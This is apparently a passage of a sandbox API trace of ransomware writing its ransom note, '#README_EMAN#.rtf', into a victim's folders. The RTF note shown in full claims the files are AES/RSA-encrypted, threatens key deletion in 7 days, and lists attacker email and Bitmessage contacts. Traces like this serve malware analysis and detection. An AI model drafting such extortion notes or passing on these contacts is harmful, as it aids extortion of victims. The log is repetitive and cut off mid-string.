COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0287.706] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0287.706] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0287.735] CloseHandle (hObject=0x2f0) returned 1 [0287.735] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\#readme_eman#.rtf")) returned 0xffffffff [0287.735] GetLastError () returned 0x2 [0287.735] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0287.736] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem 